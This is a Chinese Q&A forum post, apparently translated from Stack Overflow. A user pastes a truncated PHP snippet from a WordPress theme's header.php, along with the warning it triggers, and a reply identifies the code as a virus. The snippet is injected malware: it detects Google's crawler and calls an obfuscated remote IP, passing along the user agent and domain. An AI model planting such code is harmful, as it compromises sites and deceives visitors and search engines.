下面是我的代码:
<?php $botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if (strpos($botbotbot,"google")){$ch = curl_init(); $xxx = sqrt(30976); curl_setopt($ch, CURLOPT_URL, "http://$xxx.31.253.227/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]"
还有我的错误:
警告:使用未定义的常量HTTP_USER_AGENT-已假定 “ HTTP_USER_AGENT”(这会在以后的版本中引发错误 PHP)中 G:\ PleskVhosts \ pdmsweb.com \ mak-consultant.com \ wp-content \ themes \ themify-ultra \ header.php 在第1行
答案 0 :(得分:0)
有点晚了,但这是由病毒进入您的站点所造成的。